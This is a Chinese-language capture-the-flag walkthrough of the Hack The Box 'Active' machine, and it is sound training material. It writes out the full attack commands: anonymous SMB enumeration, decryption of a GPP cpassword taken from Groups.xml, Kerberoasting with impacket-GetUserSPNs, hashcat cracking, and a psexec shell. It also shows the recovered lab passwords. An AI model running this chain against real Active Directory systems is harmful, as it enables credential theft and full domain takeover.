Active Walkthrough

Box Info

官网在这里：Active

Active is an easy to medium difficulty machine, which features two very prevalent techniques to gain privileges within an Active Directory environment.

The Hack

使用 enum4linux 对 SMB 服务进行枚举

enum4linux -a 10.129.65.81

仅发现共享目录

使用 crackmapexec 再次探测 SMB 服务

crackmapexec smb 10.129.65.81 --shares -u '' -p '' 2>/dev/null

发现可读共享文件夹 Replication 以及域名 active.htb

使用 smbclient 尝试匿名登陆

smbclient -N //10.129.65.81/Replication

在 SMB 共享文件夹 \active.htb\Policies{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups 中发现 Groups.xml

读取 Groups.xml ，发现泄露域用户名称 active.htb\SVC_TGS 和加密后的 cpassword

<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
    <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
        <Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
    </User>
</Groups>

使用 gpp-decrypt 解密

gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

解密出来的密码为 : GPPstillStandingStrong2k18

原密文应为有效的Base64字符串，长度是4的倍数，解码后必须为16倍数，不符合的话需要适当添加 = 补齐

使用各种横向移动方式都登陆不上，比如这个 evil-winrm

那就不考虑横向移动，尝试使用 impacket-GetUserSPNs 进行 kerberoasting 攻击获得 TGS

impacket-GetUserSPNs -dc-ip 10.129.65.81 -request "active.htb/SVC_TGS":"GPPstillStandingStrong2k18"

获得了 Administrator 的 TGS

使用 hashcat 使用 13100 模式破解 TGS 票据

hashcat -m 13100 administrator_hash -a 0 /usr/share/wordlists/rockyou.txt

Administrator 密码为 Ticketmaster1968

由于目标主机 SMB 服务又开启了 ADMIN$ 共享

使用 impacket-psexec 通过 SMB 协议连接到目标主机的 ADMIN$ 共享，上传并执行一个恶意服务，获得交互式 shell

impacket-psexec "active.htb/administrator":"Ticketmaster1968"@10.129.65.81

拿下域控

在 Administrator 桌面获得 root.txt

说实话感觉自己的是非预期做法，结果出去看了看官方的 Waklthrough ，还真是这么做的

Final